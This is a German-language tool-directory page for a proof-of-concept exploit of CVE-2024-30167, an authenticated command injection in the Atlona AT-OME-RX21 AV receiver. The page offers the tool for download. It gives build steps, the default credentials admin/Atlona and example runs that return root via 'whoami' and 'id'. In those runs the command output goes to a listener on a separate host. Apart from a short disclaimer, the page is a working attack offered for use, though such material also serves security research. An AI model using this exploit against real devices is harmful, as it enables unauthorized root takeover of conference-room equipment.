Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-30167 — Proof-of-Concept-Exploit für authentifizierte Befehlsinjektion in Atlona AT-OME-RX21, die Root-Level-Befehlsausführung über die Zeiteinstellungsschnittstelle ermöglicht. | Kitploit
Tools/GitHubGitHub/rizzziom/cve-2024-30167
Embedded-System-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubrizzziom/cve-2024-30167

CVE-2024-30167

Proof-of-Concept-Exploit für authentifizierte Befehlsinjektion in Atlona AT-OME-RX21, die Root-Level-Befehlsausführung über die Zeiteinstellungsschnittstelle ermöglicht.

Repository anzeigen
112vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PoC für Atlona OME Authentifizierte Befehlsinjektion

Haftungsausschluss: Dieser Proof of Concept dient ausschließlich zu Bildungs- und Forschungszwecken. Verwenden Sie diesen Code nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Ich übernehme keine Verantwortung für Missbrauch.

Eine authentifizierte Befehlsinjektionssicherheitslücke existiert in der Zeiteinstellungsschnittstelle des Atlona AT-OME-RX21 AV-Switches. Ein Benutzer mit gültigen Anmeldedaten kann Betriebssystembefehle injizieren, die als root ausgeführt werden, was zu einer vollständigen Systemkompromittierung führt.

Produktinformation

Atlona AT-OME-RX21 ist ein AV- (Audio/Video) Empfänger und Scaler, der für professionelle Videokonferenz- und Kollaborationsumgebungen konzipiert ist. Er wird hauptsächlich in Konferenzräumen, Klassenzimmern und Huddle Spaces eingesetzt. Er hilft, Geräte wie Laptops/Konferenzsysteme mit Displays zu verbinden.

Dieser PoC funktioniert gegen alle Firmware-Versionen <= 1.5.1

Herstellerinformationen: https://atlona.com/product/at-ome-rx21/

Verwendung

$ .\cve-2024-30167.exe -h


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Usage of cve-2024-30167.exe:
  -P string
        Port für die Befehlsausgabe (Standard "4444")
  -c string
        Auf dem Ziel auszuführender Befehl
  -l string
        Host für die Befehlsausgabe
  -p string
        Passwort für die Authentifizierung (Standard "Atlona")
  -t string
        Ziel-URL (z. B. http://example.com)
  -u string
        Benutzername für die Authentifizierung (Standard "admin")
  1. Erstellen Sie eine Binärdatei für Ihr System
go build -o <OUTPUT_FILENAME>
  1. Führen Sie den Exploit gegen das Ziel-Atlona-Gerät aus
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
root

$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337    


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)

Der obige Befehl verwendet die Standard-Anmeldedaten, um sich am Gerät anzumelden.

SYNTAX:

.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>

Tool herunterladen